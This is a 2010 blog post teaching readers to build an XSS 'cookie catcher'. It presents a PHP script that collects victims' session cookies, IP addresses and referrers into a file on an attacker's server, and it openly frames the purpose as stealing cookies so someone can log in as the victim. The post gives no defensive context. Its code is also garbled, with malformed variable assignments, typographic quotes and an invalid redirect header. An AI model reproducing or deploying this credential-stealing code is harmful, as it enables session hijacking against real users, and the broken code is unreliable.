Tuesday, October 5, 2010

"COOKIE CATCHER"

///////////////////////////////////////////

Learn How to Make a Cookie Catcher

In this post i am going to show you how to make a cookie catcher. Before we
start let see what are cookies and what is cookie catcher used for.



What is a cookie?



A cookie is a special thing used store information on a web browser such as
user logins, passwords, etc.



What is a cookie catcher?



A cookie catcher is an XSS (cross-site scripting) exploitation that allows
you to take someone's cookies (log-in info). It keeps a record of them, and
the person can log-in as you using your cookies.



Is making a cookie catcher hard?



Not at all. The hard part is getting someone to click on a link that contains the cookie catcher.



How to make a Cookie Catcher



OkaY so now we are going to get down to the cookie catcher.



First you need a webserver which supports php.



Now that you have that we can begin.



Here is the cookie catcher:



PHP Code:

$cookie = $_GET['cookie'];

$ip = $_SERVER['REMOTE_ADDR'];

$date=date(“j F, Y, g:i a”);;

$refere$_SERVER['HTTP_REFERER'];

$fp = fopen('cookies.html', 'a');

fwrite($fp, 'Cookie: '.$cookie.'

IP: ' .$ip. '

Date and Time: ' .$date. '

Website: '.$referer.'





');

fclose($fp);

header ("javascript:history.back()");

?>

Now lets break that piece of code down, so that everyone can understand the working of code easily...
tells the server that this piece of code up to the

?>is php code.



$cookie = $_GET['cookie'];This gets the cookie from the web browser using

php's GET statement



$ip = $_SERVER['REMOTE_ADDR'];

$date=date(“j F, Y, g:i a”);

$referer=$_SERVER['HTTP_REFERER'];REMOTE_ADDR is the user's IP

date is well the date the cookie was taken

HTTP_REFERER is the site the user came from



$fp = fopen('cookies.html' 'a');

fwrite($fp, ‘Cookie: ‘.$cookie.’

IP: ‘ .$ip. ‘

Date and Time: ‘ .$date. ‘

Website: ‘.$referer.’





’);

fclose($fp);This piece of code does a couple of things. First is opens a

file called cookies.html on the server. Then it writes the cookie info to

the file (Cookie it's self, date, and website the person came from). After

that it adds three returns (). Next it closes the file cookies.html



header ("javascript:history.back()");

This last piece of code sends the user back to the last page they were on

before they clicked on the link



?>This like I said earlier in case you don't remember ends the php

script.There that is it! You've made your very own cookie catcher for

stealing cookies from people's browsers!



An example of this script in action is: Just upload the script on a free

hosting like - http://abc.com/cookie.php




Regards kid

No comments:

Post a Comment